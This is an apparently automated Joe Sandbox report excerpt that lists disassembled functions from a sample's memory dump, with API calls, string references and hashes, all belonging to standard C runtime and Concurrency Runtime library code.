Instruction ID: f1dd566880c304020b8d996bbf0f0fb6df610c83557b8c1e576d68047f8d5fc4
Opcode Fuzzy Hash: d7f9675b4f54dff99104e79d98987cb5448f11cedec980c9b93722f6d0da954f
Instruction Fuzzy Hash: 1CC14771900205AFCB20AF79CD51AEB7BA9AF56314F1401AFE84497351EBBC9E42C778

Function 004AF14F Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 004AF193

Part of subcall function 004AED2C: _free.LIBCMT ref: 004AED49
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AED5B
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AED6D
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AED7F
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AED91
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEDA3
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEDB5
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEDC7
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEDD9
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEDEB
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEDFD
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEE0F
Part of subcall function 004AED2C: _free.LIBCMT ref: 004AEE21

_free.LIBCMT ref: 004AF188

Part of subcall function 004AABE5: HeapFree.KERNEL32(00000000,00000000,?,004AEEBD,?,00000000,?,?,?,004AEEE4,?,00000007,?,?,004AF2E6,?), ref: 004AABFB
Part of subcall function 004AABE5: GetLastError.KERNEL32(?,?,004AEEBD,?,00000000,?,?,?,004AEEE4,?,00000007,?,?,004AF2E6,?,?), ref: 004AAC0D

_free.LIBCMT ref: 004AF1AA
_free.LIBCMT ref: 004AF1BF
_free.LIBCMT ref: 004AF1CA
_free.LIBCMT ref: 004AF1EC
_free.LIBCMT ref: 004AF1FF
_free.LIBCMT ref: 004AF20D
_free.LIBCMT ref: 004AF218
_free.LIBCMT ref: 004AF250
_free.LIBCMT ref: 004AF257
_free.LIBCMT ref: 004AF274
_free.LIBCMT ref: 004AF28C

Strings

8"M, xrefs: 004AF23B
`'M, xrefs: 004AF165

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: 8"M$`'M
API String ID: 161543041-1506308239
Opcode ID: 96a62c121d3872d5c8fadf9a7b44bd5afa29595452b39557429d2471f62e5f89
Instruction ID: 01976d4f603c6919ffc8207d318b30cfe01833ce9c61045c407ebe022f4e9a60
Opcode Fuzzy Hash: 96a62c121d3872d5c8fadf9a7b44bd5afa29595452b39557429d2471f62e5f89
Instruction Fuzzy Hash: D2318D32604600DFEB31AABAD845B5773EAAF22314F10456FE448DB251EB79BC54CB29

Function 0049433E Relevance: 21.2, APIs: 14, Instructions: 189timeregistryCOMMONLIBRARYCODE

Download Yara Rule

APIs

ListArray.LIBCONCRT ref: 00494398

Part of subcall function 00494179: RtlInitializeSListHead.NTDLL(?), ref: 00494245
Part of subcall function 00494179: RtlInitializeSListHead.NTDLL(?), ref: 0049424F

ListArray.LIBCONCRT ref: 004943CC
Hash.LIBCMT ref: 00494435
Hash.LIBCMT ref: 00494445
RtlInitializeSListHead.NTDLL(?), ref: 004944DA
RtlInitializeSListHead.NTDLL(?), ref: 004944E7
RtlInitializeSListHead.NTDLL(?), ref: 004944F4
RtlInitializeSListHead.NTDLL(?), ref: 00494501

Part of subcall function 00499AA1: std::bad_exception::bad_exception.LIBCMT ref: 00499AC3

RegisterWaitForSingleObject.KERNEL32(?,00000000,00497875,?,000000FF,00000000), ref: 00494589
Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004945AB
GetLastError.KERNEL32(004952EB,?,?,00000000,?,?), ref: 004945BD
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 004945DA

Part of subcall function 0048FA0A: CreateTimerQueueTimer.KERNEL32(?,00000001,0000000A,?,?,RI,00000008,?,004945DF,?,00000000,00497866,?,7FFFFFFF,7FFFFFFF,00000000), ref: 0048FA22

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00494604

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: List$HeadInitialize$Timer$ArrayCreateHashQueueRegister$AsyncConcurrency::details::Concurrency::details::platform::__Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorLastLibraryLoadObjectSingleWaitstd::bad_exception::bad_exception
String ID:
API String ID: 2750799244-0
Opcode ID: 4861620871e71702aae4889724e0a0a5f47edf1803425997fc2b3fbab54f41cb
Instruction ID: 93ec7d76b35150dd898882afeacecc17e85dcd70e00bafdadc6ceaaeb8e0134e
Opcode Fuzzy Hash: 4861620871e71702aae4889724e0a0a5f47edf1803425997fc2b3fbab54f41cb
Instruction Fuzzy Hash: 03816DB0A11A52BBD7449F75C845BD9FBA8BF48704F00022FF52883281DBB8A564CBD4

Function 004A5105 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 308COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 004A5200
type_info::operator==.LIBVCRUNTIME ref: 004A5227
___TypeMatch.LIBVCRUNTIME ref: 004A5333
IsInExceptionSpec.LIBVCRUNTIME ref: 004A540E
_UnwindNestedFrames.LIBCMT ref: 004A5495
CallUnexpected.LIBVCRUNTIME ref: 004A54B0

Strings

csm, xrefs: 004A51AD
csm, xrefs: 004A525E
csm, xrefs: 004A5140

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 848ba0bc0f75f00702aa13ca546c6b93ea080a20d605119f21ca57a4cfa1b8e6
Instruction ID: 82c787f53dfb71f7055d62b910f430c1fe6062a896bbd60453d6334e80ce6a6c
Opcode Fuzzy Hash: 848ba0bc0f75f00702aa13ca546c6b93ea080a20d605119f21ca57a4cfa1b8e6
Instruction Fuzzy Hash: D4C19B71800609EFCF15DF95CA81AAEBBB5BF6A315F04415BE8106B302D378DA91CB99

Function 004AA349 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004AA35F

Part of subcall function 004AABE5: HeapFree.KERNEL32(00000000,00000000,?,004AEEBD,?,00000000,?,?,?,004AEEE4,?,00000007,?,?,004AF2E6,?), ref: 004AABFB
Part of subcall function 004AABE5: GetLastError.KERNEL32(?,?,004AEEBD,?,00000000,?,?,?,004AEEE4,?,00000007,?,?,004AF2E6,?,?), ref: 004AAC0D

_free.LIBCMT ref: 004AA36B
_free.LIBCMT ref: 004AA376
_free.LIBCMT ref: 004AA381
_free.LIBCMT ref: 004AA38C
_free.LIBCMT ref: 004AA397
_free.LIBCMT ref: 004AA3A2
_free.LIBCMT ref: 004AA3AD
_free.LIBCMT ref: 004AA3B8
_free.LIBCMT ref: 004AA3C6

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 56ef3cbc7d813ab74ac15167a58134b56c449e9b4bfd81d7a58cf3e8fc2e9b8b
Instruction ID: e335c91877b4c94d936f8eea3891babb6e362bbfd804fc49baa9dd326dfe4f0f
Opcode Fuzzy Hash: 56ef3cbc7d813ab74ac15167a58134b56c449e9b4bfd81d7a58cf3e8fc2e9b8b
Instruction Fuzzy Hash: A221197A900108BFCB11EFA5C881CDE7BBABF18344F0081AAF6059F121DB35EA54CB95

Function 004971C4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 80threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00497210
SwitchToThread.KERNEL32(?), ref: 00497233
Concurrency::details::SchedulingNode::FindMatchingVirtualProcessor.LIBCONCRT ref: 00497252
Concurrency::details::InternalContextBase::GetAndResetOversubscribedVProc.LIBCMT ref: 0049726E
Concurrency::details::VirtualProcessor::MarkForRetirement.LIBCONCRT ref: 00497279
std::invalid_argument::invalid_argument.LIBCONCRT ref: 004972A0

Strings

count, xrefs: 004971DE
ppVirtualProcessorRoots, xrefs: 00497298

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$FindMatchingNode::ProcessorScheduling$Base::ContextInternalMarkOversubscribedProcProcessor::ResetRetirementSwitchThreadstd::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 3791123369-3650809737
Opcode ID: 3c7ef113da5dcc1f33502db04f4b99b983609a641f074ef4b31dfc926d627109
Instruction ID: 26a11b8831b82342c637940b8ad37f598b8a9a86184b2a70342877230c11788c
Opcode Fuzzy Hash: 3c7ef113da5dcc1f33502db04f4b99b983609a641f074ef4b31dfc926d627109
Instruction Fuzzy Hash: 59216174A10209AFCF04EF99C585AAE7BB5FF45344F1440BAE901A7361CB38AE00CF98

Function 004B54C2 Relevance: 13.8, APIs: 9, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740c6c330b1991702ab898507bd4e23ff07b3aa3029a9079fc7a71dc4cb3a1e7
Instruction ID: 98e770ddda36e1cff4a06a4ad171765aca695c106c8592ba1adb7346619d9490
Opcode Fuzzy Hash: 740c6c330b1991702ab898507bd4e23ff07b3aa3029a9079fc7a71dc4cb3a1e7
Instruction Fuzzy Hash: 27C1E270E04645AFCF15DF99D880BEEBBB1AF5A304F04405AE905AB392C7789941CF79

Function 004AA461 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004A67AA,?,?,?,?,004A73DE,?), ref: 004AA466
_free.LIBCMT ref: 004AA4C3
_free.LIBCMT ref: 004AA4F9
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,004A67AA,?,?,?,?,004A73DE,?), ref: 004AA504

Strings

x!M, xrefs: 004AA4EC

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID: x!M
API String ID: 2283115069-559007796
Opcode ID: dbefb402fe666969ba4403c87594ef1850331b450f3b41c559fd592492afe60e
Instruction ID: 4801092085d2e553810d530001c1c8e68b0ac8b0e112f22013ca3ef5a048d82e
Opcode Fuzzy Hash: dbefb402fe666969ba4403c87594ef1850331b450f3b41c559fd592492afe60e
Instruction Fuzzy Hash: 4611A7326057016E96116676AC49F6F2259DBFB378724023FF614872D2DFAD8C22816F

Function 004A63CD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004A63C2,?,?,004A638A,?,?,?), ref: 004A63E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004A63F5
FreeLibrary.KERNEL32(00000000,?,?,004A63C2,?,?,004A638A,?,?,?), ref: 004A6418

Strings

mscoree.dll, xrefs: 004A63DB
CorExitProcess, xrefs: 004A63ED

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: cb6e5b009094b802f337c35faa70ee7d17588f80c97dda5b50be4a3968e248b2
Instruction ID: 6bf0608f1c45a8332bb168d9d53a7657e712b59910c8134163b9f2e8a25deefb
Opcode Fuzzy Hash: cb6e5b009094b802f337c35faa70ee7d17588f80c97dda5b50be4a3968e248b2
Instruction Fuzzy Hash: 96F0A735501228FBDB519B51DD0DF9EBB79DB04755F154075F800B1260CBB88E01DB9C

Function 004A1252 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 004A1259
Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 004A12A4
Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 004A12D7
Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 004A1387

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
String ID:
API String ID: 2092016602-0
Opcode ID: a918243ca6247ee5b1b000085657c99a813a9ac02b9cf30bc3b56709e9e882fe
Instruction ID: 25e2428422e3c737cddc4d98f824fe8cf953c3ea6de7f226a8638747787b9f10
Opcode Fuzzy Hash: a918243ca6247ee5b1b000085657c99a813a9ac02b9cf30bc3b56709e9e882fe
Instruction Fuzzy Hash: E44182B5A00605AFCF14DF69C4819AEFBB5FF59314B14822FE415E7350DB38A941CB98

Function 004781F0 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,2AF27B5A), ref: 00478269
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004782D0
GetProcAddress.KERNEL32(00000000), ref: 004782D7

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 277d65fa25f8f650c7cca175f4b7cbd6af8ebee8e1e6965bbe4ddb3ed99e5c42
Instruction ID: c2ef6f0e9f871dfaacd6234d75d0b1b228a60060cb43a29ac5d687b3b72b0b19
Opcode Fuzzy Hash: 277d65fa25f8f650c7cca175f4b7cbd6af8ebee8e1e6965bbe4ddb3ed99e5c42
Instruction Fuzzy Hash: 3B512A70D002089BDB14EF69DD4DBDDBB75EB45714F50829EE80C973C1DB399A808B99

Function 0048F14D Relevance: 6.1, APIs: 4, Instructions: 55timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0048F16F

Part of subcall function 0048F32B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 004952E6

Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 0048F190

Part of subcall function 00490012: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0049002E

Concurrency::details::GetSharedTimerQueue.LIBCONCRT ref: 0048F1AC
Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 0048F1B3

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Timer$Scheduler$Base::LibraryLoadQueue$AsyncConcurrency::details::platform::__ContextCreateCurrentDefaultReferenceRegisterShared
String ID:
API String ID: 1684785560-0
Opcode ID: 466249a33121589677fe169d88dea5805c0e83d4a7d1cd62b8c988084987b406
Instruction ID: 3f78040ab5c575ad355a06a0a375b74aa9bac9f38241b4ccd663f552da70e169
Opcode Fuzzy Hash: 466249a33121589677fe169d88dea5805c0e83d4a7d1cd62b8c988084987b406
Instruction Fuzzy Hash: DD01C471500305EAD7207F6ACC86D5FBBACEF10798B104D3FF85592191D7B8D91887A9

Function 004A321E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 004A3238
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 004A324C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 004A3264
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 004A327C

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction ID: 0cb111384a66ffd45a568fdebdc488991af70931d86d1fa927c1ca57f90f4d9d
Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
Instruction Fuzzy Hash: 24012B37200514B7CF16AE558801BEF77999F66355F0004ABFC01AB241E938EF0182A5

Function 00499370 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00499379

Part of subcall function 0048F32B: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 004952E6

Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0049939D
Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 004993B0
Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 004993B9

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
String ID:
API String ID: 218105897-0
Opcode ID: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction ID: 44b4273a63642439316d7a20eef42208ec32443bfde8759f7148c3144c29e47b
Opcode Fuzzy Hash: 286b84610833cc548c653b23f9a84c5695ef3105fb3579eb3866e9586b336a7e
Instruction Fuzzy Hash: 9BF08231200A104EEA70AE6A9811F6A27989B49719F00842FE91686282CA2DEC428759

Function 004AE11F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(0000FDE9,?,?,?,00000000), ref: 004AE151

Strings

JJ, xrefs: 004AE136
, xrefs: 004AE196

Memory Dump Source

Source File: 00000013.00000002.2037470730.0000000000471000.00000020.00000001.01000000.00000013.sdmp, Offset: 00470000, based on PE: true

Associated: 00000013.00000002.2037444273.0000000000470000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037516187.00000000004C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037550169.00000000004D2000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037578490.00000000004D4000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037602477.00000000004D5000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000013.00000002.2037631003.00000000004D9000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_470000_Nework.jbxd

Yara matches

Similarity

API ID: Info
String ID: $JJ
API String ID: 1807457897-1540583698
Opcode ID: ec28771a14ea1d0c5c01a6936e125e1443d4fd1d9d092d4b9ce09eb90883857e
Instruction ID: 3610221604809a2c206386543ab86595240612dc057a63fcc4e1d7ad582845c0
Opcode Fuzzy Hash: ec28771a14ea1d0c5c01a6936e125e1443d4fd1d9d092d4b9ce09eb90883857e
Instruction Fuzzy Hash: 16416B715042589EDB218F1ACD84BFB7BFDEB66304F2408EEE1AA87142D2389D45DB64

Function 004AE2A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

